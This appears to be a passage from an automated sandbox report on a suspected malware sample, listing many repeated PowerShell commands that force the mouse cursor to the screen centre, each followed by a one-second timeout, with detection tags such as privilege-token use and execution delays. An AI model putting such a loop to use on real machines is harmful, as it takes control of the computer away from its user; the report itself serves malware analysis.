- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5980
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1172
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5228
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:5652
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3328
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:6096
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1920
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:5276
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5660
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5748
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1684
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5336
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5828
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2232
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5464
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3064
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5428
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:5848
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5660
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:6048
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5728
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:5340
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5292
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:5876
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:6072
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:6080
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5848
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:5660
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5372
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3692
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5212
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:5384
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:5664
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:5012
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:4308
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:5816
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:5656
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:6048
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:6060
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:5276
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  PID:5224
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:6040
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5496
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4900
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5368
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:5184
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  PID:3976
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3244
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5828
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4644
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  PID:4308
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:5376
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5648
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:5012
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:3136
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:5372
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5228
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:5360
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:6076
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:612
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5984
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:5224
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5216
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2308
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5372
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:5232
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5228
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:5368
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:3568
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2476
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:1188
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:5836
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5184
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:5580
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:4476
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:6004
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:2680
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1920
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:672
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4636
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5764
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4396
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5276
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:5848
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5796
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2072
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:3336
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:6004
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5240
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:6060
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:2680
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4756
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5772
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4676
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5820
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3324
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5932
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2232
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:4584
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:5352
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:2488
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4964
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5832
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2680
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:4756
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5868
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  PID:532
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:5764
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  PID:5212
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:5972
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5436
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5688
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:4968
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:6072
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:1608
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2552
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5756
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2680
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  PID:6096
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4352
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
